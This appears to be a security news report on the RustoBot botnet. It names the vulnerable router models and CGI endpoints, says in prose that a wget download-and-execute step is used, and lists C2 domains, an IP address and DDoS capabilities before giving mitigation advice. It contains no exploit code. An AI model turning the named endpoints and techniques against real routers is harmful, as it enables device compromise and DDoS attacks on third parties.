A newly identified botnet, termed RustoBot, has been discovered targeting vulnerable routers globally. This sophisticated malware, developed using the Rust programming language, exploits critical vulnerabilities in specific TOTOLINK and DrayTek router models, enabling remote command injections. The primary regions affected include Japan, Taiwan, Vietnam, and Mexico, with potential implications for various technology sectors.
Targeted Router Models and Vulnerabilities
RustoBot primarily focuses on the following TOTOLINK router models:
– N600R
– A830R
– A3100R
– A950RG
– A800R
– A3000RU
– A810R
The malware exploits vulnerabilities within the `cstecgi.cgi` file, a CGI script responsible for processing user inputs and administrative commands. These flaws allow attackers to execute remote code on compromised devices.
In addition to TOTOLINK devices, RustoBot targets DrayTek Vigor2960 and Vigor300B routers through the CVE-2024-12987 vulnerability. This OS command injection flaw resides in the `cgi-bin/mainfunction.cgi/apmcfgupload` interface, providing a pathway for unauthorized command execution.
Exploitation Techniques
The initial exploitation phase involves sending crafted requests to the vulnerable endpoints of the targeted routers. For TOTOLINK devices, attackers utilize a malicious command string directed at the `cstecgi.cgi` endpoint. This command typically employs tools like `wget` to download and execute the malware binary, specifically designed for the router’s architecture.
Upon successful compromise, RustoBot deploys multiple variants tailored to different architectures, including arm5, arm6, arm7, mips, and mpsl. This multi-architecture approach ensures broad compatibility across various router models and embedded systems, enhancing the botnet’s reach and effectiveness.
Advanced Operational Techniques
RustoBot incorporates several sophisticated methods to maintain its operation and evade detection:
– API Function Retrieval: The malware retrieves system API functions from the Global Offset Table (GOT), facilitating seamless interaction with the compromised system.
– Configuration Data Encryption: It employs XOR encryption to encode its configuration data, complicating analysis and reverse engineering efforts.
– Complex Instruction Sequences: The malware calculates decoder key offsets using intricate instruction sequences, adding another layer of obfuscation.
Command and Control Infrastructure
Once established on a compromised device, RustoBot connects to its command and control (C2) infrastructure by resolving domains such as:
– dvrhelper.anondns.net
– techsupport.anondns.net
– rustbot.anondns.net
– miraisucks.anondns.net
All these domains resolve to the same IP address (5.255.125.150), indicating a centralized control mechanism. The botnet then awaits instructions to launch various Distributed Denial-of-Service (DDoS) attacks.
DDoS Attack Capabilities
RustoBot is equipped to perform several types of DDoS attacks, with a notable emphasis on UDP flooding. In this attack vector, the malware generates massive volumes of UDP packets, each with a 1400-byte payload, directed at specified target IP addresses and ports. This overwhelming influx of data can incapacitate victim infrastructure, leading to significant service disruptions.
Implications and Recommendations
The emergence of RustoBot underscores the persistent vulnerabilities present in Internet of Things (IoT) and network devices. The use of Rust for developing such malware indicates a shift towards more stable and cross-platform compatible threats.
To mitigate the risks associated with RustoBot and similar threats, it is recommended that users and organizations:
– Update Firmware Regularly: Ensure that all router firmware is up-to-date to patch known vulnerabilities.
– Change Default Credentials: Replace default usernames and passwords with strong, unique credentials to prevent unauthorized access.
– Disable Unnecessary Services: Turn off services and features that are not in use to reduce potential attack vectors.
– Monitor Network Traffic: Implement network monitoring tools to detect unusual traffic patterns indicative of compromise.
– Isolate IoT Devices: Place IoT devices on separate network segments to limit the impact of a potential breach.
By adopting these proactive measures, individuals and organizations can enhance their defense against evolving cyber threats like RustoBot.
